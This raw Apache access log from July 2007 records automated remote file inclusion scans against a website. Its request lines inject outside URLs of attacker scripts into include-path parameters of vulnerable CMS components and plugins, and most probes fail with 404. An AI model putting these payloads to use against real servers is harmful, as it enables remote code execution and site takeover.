85.10.128.248 - - [22/Jul/2007:17:00:05 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:17:00:05 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.126.205.230 - - [22/Jul/2007:17:00:07 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.atkilg.xpg.com.br/Owner/scan/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:17:00:33 -0700] "GET /logs/access.log//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
218.38.28.199 - - [22/Jul/2007:17:00:45 -0700] "GET /logs//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
218.38.28.199 - - [22/Jul/2007:17:00:45 -0700] "GET //myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.18.10.148 - - [22/Jul/2007:17:00:47 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.10.148 - - [22/Jul/2007:17:00:47 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:17:01:00 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:17:01:00 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
72.232.234.138 - - [22/Jul/2007:17:01:03 -0700] "GET /logs/access_070618.log HTTP/1.1" 200 715099 "-" "Dnsvb tcfn fsqkayj" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:17:01:37 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:17:01:37 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:17:02:06 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:17:02:06 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
209.216.252.124 - - [22/Jul/2007:17:02:16 -0700] "GET /logs/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.216.252.124 - - [22/Jul/2007:17:02:16 -0700] "GET /myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:17:02:46 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:17:02:50 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:17:03:04 -0700] "GET /logs/template.php?pagina=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:17:03:05 -0700] "GET /template.php?pagina=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:17:03:06 -0700] "GET /index.php?include=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:17:03:08 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:17:03:08 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:17:03:08 -0700] "GET /logs/index2.php?content=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:17:03:09 -0700] "GET /index2.php?content=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.10.148 - - [22/Jul/2007:17:03:25 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.10.148 - - [22/Jul/2007:17:03:25 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:17:03:46 -0700] "GET /logs/index2.php?url_page=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:17:03:46 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.114.133.27 - - [22/Jul/2007:17:03:46 -0700] "GET /index2.php?url_page=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
85.114.133.27 - - [22/Jul/2007:17:03:46 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
66.90.73.66 - - [22/Jul/2007:17:03:50 -0700] "GET /logs/announcements.php?phpraid_dir=http://viusanewsletter.com//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.90.73.66 - - [22/Jul/2007:17:03:50 -0700] "GET /announcements.php?phpraid_dir=http://viusanewsletter.com//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.23.125.140 - - [22/Jul/2007:17:06:04 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.23.125.140 - - [22/Jul/2007:17:06:04 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
213.23.125.140 - - [22/Jul/2007:17:06:57 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.23.125.140 - - [22/Jul/2007:17:06:57 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
209.216.252.124 - - [22/Jul/2007:17:07:05 -0700] "GET /logs/access.log/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.216.252.124 - - [22/Jul/2007:17:07:05 -0700] "GET /myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.216.252.124 - - [22/Jul/2007:17:07:05 -0700] "GET /logs/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:17:07:44 -0700] "GET /logs/access.log//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.23.125.140 - - [22/Jul/2007:17:07:49 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.23.125.140 - - [22/Jul/2007:17:07:49 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
206.51.227.146 - - [22/Jul/2007:17:08:34 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
206.51.227.146 - - [22/Jul/2007:17:08:35 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:17:08:49 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:17:08:53 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.38.28.199 - - [22/Jul/2007:17:09:42 -0700] "GET /logs/access.log//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
218.38.28.199 - - [22/Jul/2007:17:10:24 -0700] "GET /logs/access.log//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
218.38.28.199 - - [22/Jul/2007:17:11:24 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
218.38.28.199 - - [22/Jul/2007:17:11:24 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.6.19.80 - - [22/Jul/2007:17:12:00 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.23.20 - - [22/Jul/2007:17:12:01 -0700] "GET /logs/access_070514.log HTTP/1.0" 200 248063 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.15.70.58 - - [22/Jul/2007:17:12:03 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://easter.fr/easter/inc/c.in?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:17:12:47 -0700] "GET /logs/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:17:12:48 -0700] "GET /myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.84.21.119 - - [22/Jul/2007:17:13:24 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://easter.fr/easter/inc/c.in?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
218.38.28.199 - - [22/Jul/2007:17:14:09 -0700] "GET /logs/access.log//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.216.252.124 - - [22/Jul/2007:17:14:34 -0700] "GET /logs/access.log//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.216.252.124 - - [22/Jul/2007:17:14:34 -0700] "GET //myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.216.252.124 - - [22/Jul/2007:17:14:34 -0700] "GET /logs//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
201.72.166.36 - - [22/Jul/2007:17:15:09 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.72.166.36 - - [22/Jul/2007:17:15:10 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:17:15:58 -0700] "GET /logs//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:17:15:59 -0700] "GET //myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
206.51.227.146 - - [22/Jul/2007:17:16:01 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
206.51.227.146 - - [22/Jul/2007:17:16:07 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
206.51.227.146 - - [22/Jul/2007:17:16:22 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
67.18.10.148 - - [22/Jul/2007:17:16:24 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.10.148 - - [22/Jul/2007:17:16:25 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
206.51.227.146 - - [22/Jul/2007:17:16:28 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:17:17:21 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:17:17:21 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
218.38.28.199 - - [22/Jul/2007:17:18:43 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
218.38.28.199 - - [22/Jul/2007:17:18:43 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:17:19:01 -0700] "GET /logs/announcements.php?phpraid_dir=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:17:19:02 -0700] "GET /announcements.php?phpraid_dir=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:17:19:09 -0700] "GET /logs/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
64.40.99.241 - - [22/Jul/2007:17:19:09 -0700] "GET /myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:17:19:15 -0700] "GET /logs/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
70.84.7.74 - - [22/Jul/2007:17:19:15 -0700] "GET /myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:17:19:45 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:17:19:47 -0700] "GET /logs/access.log/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:17:19:48 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.126.205.230 - - [22/Jul/2007:17:21:11 -0700] "GET /logsmain.php?id=http://www.atkilg.xpg.com.br/Owner/scan/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
83.16.15.42 - - [22/Jul/2007:17:21:25 -0700] "GET /logs//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:17:21:29 -0700] "GET //myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
206.51.227.146 - - [22/Jul/2007:17:22:10 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
206.51.227.146 - - [22/Jul/2007:17:22:11 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:17:23:00 -0700] "GET /logs/access.log//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:17:23:18 -0700] "GET /logs/access.log/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:17:23:30 -0700] "GET /logs/access.log/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:17:23:35 -0700] "GET /logs//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:17:23:35 -0700] "GET //myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.18.10.148 - - [22/Jul/2007:17:24:12 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
67.18.10.148 - - [22/Jul/2007:17:24:12 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:17:24:19 -0700] "GET /logs//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:17:24:19 -0700] "GET //myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
218.38.28.199 - - [22/Jul/2007:17:24:36 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
218.38.28.199 - - [22/Jul/2007:17:24:36 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.18.10.148 - - [22/Jul/2007:17:25:06 -0700] "GET /logs//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.10.148 - - [22/Jul/2007:17:25:06 -0700] "GET //myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.38.28.199 - - [22/Jul/2007:17:26:12 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
218.38.28.199 - - [22/Jul/2007:17:26:12 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
85.158.202.29 - - [22/Jul/2007:17:28:37 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:17:28:37 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
69.56.181.122 - - [22/Jul/2007:17:29:37 -0700] "GET /logs/access_070611.log/index.php?p=http://bapoz.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.56.181.122 - - [22/Jul/2007:17:29:38 -0700] "GET /index.php?p=http://bapoz.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.56.181.122 - - [22/Jul/2007:17:29:38 -0700] "GET /logs/index.php?p=http://bapoz.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:17:31:33 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:17:31:34 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
216.227.217.225 - - [22/Jul/2007:17:32:19 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.deutschetoscana.de/winwin/images/stories/winwin/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.227.217.225 - - [22/Jul/2007:17:32:21 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.deutschetoscana.de/winwin/images/stories/winwin/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.227.217.225 - - [22/Jul/2007:17:32:23 -0700] "GET /logs/access.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.deutschetoscana.de/winwin/images/stories/winwin/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:17:32:50 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
